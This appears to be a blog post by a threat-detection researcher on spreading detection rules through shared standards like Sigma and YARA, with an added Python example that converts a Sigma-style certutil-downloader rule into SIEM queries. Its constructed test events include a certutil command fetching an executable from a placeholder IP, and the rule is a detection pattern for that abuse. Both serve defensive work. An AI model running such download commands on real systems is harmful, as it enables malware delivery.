Leverage is Key

Florian Roth
Jun 7, 2020 · 5 min read

Maximizing the effect of defensive research

We live in challenging times. As a security researcher focusing on threat detection, I frequently notice and comment on the increasing use of off-the-shelf tools by nation-state actors.

My team and I monitor that landscape closely and have noticed an increase in tool publications and updates since the beginning of the COVID-19 pandemic. We believe this increase is caused by members of the offensive security research community being confined to their homes, eager to develop, release and spend their time in a meaningful way.

I’ve exported statistics on the elements in our internal rule generation stack that are tagged as “hacktool”. My team adds articles, samples, tweets and reports to that list every day. You can see that the number of elements tagged “hacktool” has increased over the last 8 weeks. Sure, this is a subjective view, since it also depends on my team’s attentiveness, but I’ve at least tried to underpin my impression with our internally collected data. I’d love to see statistics on releases of projects (new ones and major updates) in the “security” category on GitHub over the last 6 months.

Number of tools dropped on our signature generation stack (by number of week in 2020)

Since a passion for offensive research is usually deeply rooted in a person’s character, viewpoints and field of activity, this situation cannot be changed overnight.

We, as defensive researchers, have to find ways to harness the same advantages of global collaboration to tackle this spike in supply and to spend our time more effectively.

Sharing Detection Ideas

Just like the offsec community, the community of defensive researchers has to improve existing starting points and find new ones to maximize the effect of detection ideas that a single person has developed.

The demand for such methods has increased significantly over the last 10 years, and many standards, tools and frameworks have stepped in to satisfy it. Snort, YARA, STIX and Sigma act as containers that researchers can use to transport detection ideas or indicators.

John Lambert calls them “Detection Definitions” in his great article on the “Githubification of InfoSec”. If you haven’t read John’s article yet, I recommend it, as it does a much better job of explaining the benefits of shared detection definitions.

Githubification of InfoSec by John Lambert

With this post, I’d like to add some of my personal perspectives to it.

Free or Paid Content — Everything Helps

The great thing about free markets is that demand determines the price. The prices that customers are willing to pay for a good or a service are an indicator of its value to buyers. Our industry has an immense demand for detection definitions as well as for supporting tools and services.

Some would argue that we can only maximize the effect of detection ideas by sharing them openly and freely: selling them in the form of a feed, a report or a package would reduce the number of recipients and thus wouldn’t exploit their full potential.

I’d respond that there is demand for both forms, and that there are often-overlooked synergies between them.

Companies that sell their detection logic have incentives to drive the adoption of open standards in commercial or free products as their customers can make use of these integrations to apply the detection rules.

Cisco is a good example for Snort, SOC Prime for Sigma, EclecticIQ for STIX and we at Nextron for YARA. We influence these standards, provide free content, open source tools or libraries, and benefit from wider adoption since we also sell curated content that extends the freely available rules. It’s a win-win.

Commercial feed providers typically also have to prove that their rules are sound and useful. Some, though not all, do this by providing free content or free demo access to their platforms.

I am a strong believer in the freemium model. The idea is: “Give away a good portion of your product for free and sell extras to customers with higher demands and bigger budgets.” In this setup we even create a win-win-win situation in which everyone benefits: supplier, buyers and users of the free content.

Creating Leverage

What made me start the Sigma project with Thomas was a simple SIEM consulting project in 2016.

The task was to process a set of 10+ PDF documents, extract the detection logic and describe it in the form of chapters in an MS Word document, including specific queries for the customer’s SIEM.

It wasn’t a very difficult task, but I noticed that I lacked enthusiasm. The reason was that I had written similar documents before, for other customers and other SIEM systems. Spending so much time on a single SIEM query that would only work in that one customer’s environment just felt wrong. There had to be a better way.

Therefore, Thomas and I created Sigma as an open standard to describe detection ideas in log data. It’s not very creative or ingenious; it was just something we had missed.

By being able to describe detection methods in a generic and shareable form, each invested hour can have a significantly bigger effect. A 1:1 relation suddenly becomes a 1:n relation, as people all over the world who receive your rules are immediately in a position to detect threats with them.

Even a small push can have a big impact using the right lever.

We have to spot opportunities, and develop and use containers like YARA, Snort / Suricata or Sigma to maximize the effectiveness of our research.
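The 1:n effect is easiest to see with a rule in hand. The following is an added example, not Sigma’s own converter (sigmac) and not code from this post: a toy Python converter that takes one Sigma-style rule, written as a dict in a subset of Sigma’s syntax (selection maps, the |contains / |startswith / |endswith / |all modifiers, a boolean condition), renders it once as a Splunk search and once as an Elasticsearch query_string, and also evaluates the same rule directly against three constructed Sysmon-style process_creation events. The certutil-as-downloader rule, the msiexec tuning filter, the events and the 198.51.100.7 address are all made up for illustration, and the two query dialects are simplified approximations of what the real backends emit.

```python
"""Toy Sigma-style converter and matcher (added example, not Sigma's own tooling):
one generic detection description is rendered into two SIEM query dialects and
also run directly against constructed log events."""

# Constructed rule in a subset of Sigma's structure, as a dict so no PyYAML is needed.
RULE = {
    "title": "Certutil Used as Downloader",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        "filter": {"ParentImage|endswith": "\\msiexec.exe"},  # hypothetical tuning
        "condition": "selection and not filter",
    },
}

# Constructed Sysmon-style process_creation events (not real telemetry).
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://198.51.100.7/setup.cab",
     "ParentImage": "C:\\Windows\\System32\\msiexec.exe"},  # suppressed by filter
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -verify signed.cer",
     "ParentImage": "C:\\Windows\\explorer.exe"},  # benign use, no download
]

# Value modifiers: how a pattern is compared (matching) and rendered (query text).
_MATCHERS = {"contains": lambda v, p: p in v, "startswith": str.startswith,
             "endswith": str.endswith}
_WILDCARDS = {"contains": "*{}*", "startswith": "{}*", "endswith": "*{}"}

def _match_value(value: str, pattern: str, mods: list) -> bool:
    fn = next((_MATCHERS[m] for m in mods if m in _MATCHERS), str.__eq__)
    return fn(value.lower(), pattern.lower())  # Sigma string matching is case-insensitive

def _wildcard(pattern: str, mods: list) -> str:
    return next((_WILDCARDS[m] for m in mods if m in _WILDCARDS), "{}").format(pattern)

def match_selection(selection: dict, event: dict) -> bool:
    """Every field of a selection map must match; list values are OR-ed unless |all."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        patterns = [patterns] if isinstance(patterns, str) else patterns
        hits = [_match_value(str(event.get(field, "")), p, mods) for p in patterns]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def eval_condition(condition: str, truth: dict) -> bool:
    """Left-to-right 'a and not b or c'. Simplification: no parentheses/precedence,
    which real Sigma conditions do allow."""
    result, op, negate = True, "and", False
    for tok in condition.split():
        if tok in ("and", "or"):
            op = tok
        elif tok == "not":
            negate = True
        else:
            val, negate = truth[tok] != negate, False
            result = (result and val) if op == "and" else (result or val)
    return result

def match_rule(rule: dict, event: dict) -> bool:
    det = rule["detection"]
    truth = {n: match_selection(s, event) for n, s in det.items() if n != "condition"}
    return eval_condition(det["condition"], truth)

def _render_selection(selection: dict, backend: str) -> str:
    clauses = []
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        patterns = [patterns] if isinstance(patterns, str) else patterns
        # both dialects treat a backslash inside a value as an escape character
        values = [_wildcard(p, mods).replace("\\", "\\\\") for p in patterns]
        if backend == "splunk":
            parts = [f'{field}="{v}"' for v in values]
        elif backend == "lucene":  # Elasticsearch query_string syntax
            parts = [f"{field}:{v}" for v in values]
        else:
            raise ValueError(f"unknown backend {backend!r}")
        joiner = " AND " if "all" in mods else " OR "
        clauses.append(parts[0] if len(parts) == 1 else "(" + joiner.join(parts) + ")")
    return " AND ".join(clauses)

def rule_to_query(rule: dict, backend: str) -> str:
    """Render the condition, replacing each selection name with its backend clause."""
    det = rule["detection"]
    return " ".join(tok.upper() if tok in ("and", "or", "not")
                    else "(" + _render_selection(det[tok], backend) + ")"
                    for tok in det["condition"].split())

if __name__ == "__main__":
    for backend in ("splunk", "lucene"):
        print(f"{backend:>6}: {rule_to_query(RULE, backend)}")
    print("matching:", [i for i, ev in enumerate(EVENTS) if match_rule(RULE, ev)])
```

The same dict drives both the query generation and the matcher, so a rule written once lands in every SIEM for which a backend exists, and the constructed events show why the filter matters: the download via msiexec is suppressed, the benign -verify call never matches, and only the cmd.exe-spawned download fires.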

Tweet mentioning different rule types to cover an threat group’s activity

Shifting the Spotlight

From now on, someone publishing a detection rule for an exploit should get the same applause as the person who published the exploit. It’s even better: this applause comes from the right people only.

As I said, our industry has a high demand for detection logic, but that isn’t all.

In order to make best use of it we also need:

  • Libraries for conversion
  • Importers and exporters
  • Automatic rule generators
  • Rule management
  • Rule testing and quality assurance
  • Curation services
  • Dashboards and correlation
  • Feed concentrators
  • Custom extensions to meet special needs
  • Rule rating and feedback systems
  • Automatic documentation
  • Duplicate and overlap detectors
  • Grouping and tagging to create rule sets
  • Demo environments and test data

Provide a service or tool to help people with these tasks and you can start a new defensive open source project or business.

Companies already offer so-called “threat bounties” (Polyswarm, SOC Prime) in which you get paid for providing detection rules or for the detection itself. This could be an interesting opportunity for researchers looking for new ways to make money from home.

The challenges are endless, but so are the possibilities.

Follow me on Twitter or LinkedIn